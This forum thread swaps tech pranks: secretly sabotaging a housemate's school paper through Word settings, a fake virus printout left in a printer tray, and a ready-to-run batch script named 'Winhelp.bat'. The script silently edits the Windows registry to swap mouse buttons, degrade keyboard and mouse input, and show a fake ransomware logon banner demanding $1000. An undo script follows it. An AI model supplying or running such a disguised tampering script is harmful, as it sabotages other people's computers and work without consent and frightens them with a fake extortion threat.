Technology related pranks

Status
Not open for further replies.
I took Qiranworms' idea of adjusting settings in ms word. It worked well. My house mate turned the paper in, and did not notice the changes I had made. I didn't make any drastic changes, just minor. Such as changing the ei in their to ie, and other small changes inside words. Since he did not notice any of them, I will have to keep adding more each day until its oblivious. Thanks for the idea.
No problem. I take no responsibility for damage caused. ;)

Anyway, here's something a bit different. For anyone with a printer that has a closed paper tray (most lasers), put in a page covered with a giant bold message of your choice, facing whatever direction necessary to get their next document to go on top of it. You can talk about viruses, or whatever you come up with. Maybe put white text on a dark fullpage image so it will effectively cover whatever text they next print, and they'll primarily see your image/message.

It's possible that the victim will try and scan the computer for virsues and all, and forget about looking in the paper tray for any more 'prepared paper'. In which case, it would work for as many pages as you've bothered to set up.

Never actually tried this, post how it goes if anyone does.

u guys want a funny prank

copy this into notepad:

echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="1" >> c:\reg.reg
echo "MouseSpeed"="3" >> c:\reg.reg
echo "DoubleClickSpeed"="100" >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Keyboard] >> c:\reg.reg
echo "KeyboardDelay"="5" >> c:\reg.reg
echo "KeyboardSpeed"="10" >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo "Start Page"="http://www.google.com/" >> c:\reg.reg
echo.
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:1 >> c:\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
echo "LegalNoticeText"="You're computer has been infected with the Win32.RansomIntel Virus, If you attempt to reboot it'll delete all system files upon reboot. To get rid of this virus, send $1000 dollars to your floppy drive" >> c:\reg.reg

REGEDIT /s c:\reg.reg
start iexplore.exe Google
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
exit

Now save it as: Winhelp.bat

run it and enjoy, what it does is laggs the **** out of ur mouse and keyboard and it loads google.com couple times out of no were, and gives them a message before the user accounts show up

o ya.... and if u idiotically press it heres a cure, just make it into .bat file and run it:

echo off
echo REGEDIT4 >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="0" >> c:\reg.reg
echo "MouseSpeed"="2" >> c:\reg.reg
echo "DoubleClickSpeed"="50" >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Keyboard] >> c:\reg.reg
echo "KeyboardDelay"="2" >> c:\reg.reg
echo "KeyboardSpeed"="2" >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:0 >> c:\reg.reg
REGEDIT /s c:\reg.reg
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
del "c:\reg.reg"
exit

save it as : WINHELP.bat

Status
Not open for further replies.
Back
Top Bottom